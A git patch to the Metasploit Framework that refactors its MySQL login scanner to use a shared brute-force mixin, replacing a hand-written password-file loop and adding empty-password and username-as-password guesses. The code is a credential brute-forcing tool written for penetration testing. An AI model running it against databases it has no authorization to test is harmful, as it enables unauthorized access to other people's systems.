From 08eb80f4a9b2474314f2e1ff010cab48e7926c8a Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 18 Jan 2010 22:22:22 +0000 Subject: [PATCH] use the authbrute mixin git-svn-id: file:///home/svn/framework3/trunk@8150 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/core/exploit/mysql.rb | 6 +- .../auxiliary/scanner/mysql/mysql_login.rb | 70 ++++++------------- 2 files changed, 23 insertions(+), 53 deletions(-) diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index 1e0e29de3d..57e04f969e 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -29,8 +29,8 @@ module Exploit::Remote::MYSQL [ Opt::RHOST, Opt::RPORT(3306), - OptString.new('MYSQL_USER', [ true, 'The username to authenticate as', 'root']), - OptString.new('MYSQL_PASS', [ false, 'The password for the specified username', '']), + OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), + OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), ], Msf::Exploit::Remote::MYSQL ) end @@ -55,7 +55,7 @@ module Exploit::Remote::MYSQL end def mysql_login_datastore - mysql_login(datastore['MYSQL_USER'], datastore['MYSQL_PASS']) + mysql_login(datastore['USERNAME'], datastore['PASSWORD']) end def mysql_query(sql) diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 59bc83206c..3a6e8790ac 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -16,9 +16,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL - include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, @@ -31,56 +32,15 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('MYSQL_PASS_FILE', [ false, 'A dictionary of passwords to perform a bruteforce attempt']), OptBool.new('VERBOSE', [ true, 'Verbose output', false]) ], self.class) end def run_host(ip) - - user = datastore['MYSQL_USER'].to_s - user = "root" if user.empty? - - if (datastore['MYSQL_PASS_FILE'] and not datastore['MYSQL_PASS_FILE'].empty?) - stime = Time.now.to_f - cnt = 0 - - File.open(datastore['MYSQL_PASS_FILE'], "rb") do |fd| - lcnt = 0 - fd.each_line{lcnt += 1 } - fd.seek(0) - - # Always try a blank password (not handled in the file parsing) - ret = do_login(user, '', datastore['VERBOSE']) - return if ret == :pass - return if ret == :error - - fd.each_line do |line| - line.strip! - next if line =~ /^#/ - next if line.empty? - - ret = do_login(user, line.strip, datastore['VERBOSE']) - break if ret == :pass - break if ret == :error - - cnt += 1 - if(cnt % 1000 == 0) - pps = (cnt / (Time.now.to_f - stime)).to_i - pct = (cnt/lcnt.to_f * 100.0).to_i - eta = ((lcnt - cnt) / pps / 60.0).to_i - print_status( - "#{rhost}:#{rport} completed #{cnt}/#{lcnt} passwords (#{pct}%) " + - "at a rate of #{pps} per second " + - "ETA #{eta} minutes" - ) - end - end - end - else - do_login(user, datastore['MYSQL_PASS'], datastore['VERBOSE']) - end + each_user_pass { |user, pass| + do_login(user, pass, datastore['VERBOSE']) + } end @@ -92,24 +52,34 @@ class Metasploit3 < Msf::Auxiliary print_status("#{rhost}:#{rport} successful logged in as '#{user}' with password '#{pass}'") report_auth_info( :host => rhost, - :proto => 'MYSQL', + :proto => 'mysql', :user => user, :pass => pass, :targ_host => rhost, :targ_port => rport ) - return :pass + return :next_user rescue ::RbMysql::AccessDeniedError - print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose - return :fail + print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose + return :fail rescue ::RbMysql::Error => e print_error("#{rhost}:#{rport} failed to login: #{e}") return :error rescue ::Interrupt raise $! rescue ::Rex::ConnectionError - return :error + return :done end end + + def next_pass(state) + # Always try empty and the username + passes = ['', state[:user]] + state[:idx] ||= 0 + pass = passes[state[:idx]] + state[:idx] += 1 + return pass + end + end